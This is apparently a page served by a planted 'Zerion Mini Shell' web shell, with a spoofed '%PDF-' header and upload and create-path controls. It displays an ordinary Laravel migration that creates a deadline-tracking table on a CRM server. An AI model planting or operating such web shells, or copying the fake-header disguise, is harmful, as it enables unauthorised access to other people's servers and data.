%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/tsi-crm/database/migrations/
Upload File :
Create Path :
Current File : /var/www/tsi-crm/database/migrations/2024_02_05_115854_scadenziario.php

<?php

use Illuminate\Database\Migrations\Migration;
use Illuminate\Database\Schema\Blueprint;
use Illuminate\Support\Facades\Schema;

return new class extends Migration
{
    /**
     * Run the migrations.
     */
    public function up(): void
    {
        Schema::create('scadenziario', function (Blueprint $table) {
            $table->id();
            $table->string('name');
            $table->string('prescrizioniLegali');
            $table->string('aziende');
            $table->string('lbl_conformita');
            $table->string('assignedTo');
            $table->date('dataScadenza');
            $table->date('lbl_datalavoro');
            $table->string('lbl_note');

            $table->timestamps();
        });
    }

    /**
     * Reverse the migrations.
     */
    public function down(): void
    {
        //
    }
};

Zerion Mini Shell 1.0